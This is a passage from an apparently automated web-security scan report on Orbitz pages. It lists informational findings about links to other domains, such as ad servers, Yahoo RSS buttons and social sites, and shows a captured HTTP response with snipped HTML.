width="1" border="0"></a>
...[SNIP]...

17.354. http://www.orbitz.com/App/PrepareDealsHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareDealsHome

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PrepareDealsHome?z=2ebd&r=g

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif
http://us.rd.yahoo.com/my/atm/Orbitz.com/Car%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/cardeals.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Cruise%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/cruises.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Flight%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/flightdeals.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotel%20Property%20Offers/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/hotelpromos.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/New!%20Top%20Hotel%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-hotels.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Top%20Flight%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-flights.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-vacationpackages.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Packages%20by%20Destination/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/lowestpackages.rss.xml
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=300x200_dow&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=7792E3066C693DCF4AE33C8512720DC7; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:28 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 113149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-t
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-vacationpackages.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Packages%20by%20Destination/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/lowestpackages.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/New!%20Top%20Hotel%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-hotels.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotel%20Property%20Offers/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/hotelpromos.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Top%20Flight%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-flights.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Flight%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/flightdeals.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
</tr>

   <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"></script> <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"></script> <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"></script>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Car%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/cardeals.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Cruise%20Deals/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/cruises.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x200_dow">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=300x200_dow&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&" height="600" width="300" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=600&width=300&adType=noframe&" height="600" width="300" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
</html>
<iframe allowtransparency="true" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662789117&dsrc=7&" height="1" width="1" border="0"></a>
...[SNIP]...

17.355. http://www.orbitz.com/App/PrepareFlightsTab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareFlightsTab

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PrepareFlightsTab?z=2eb9&r=c

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&
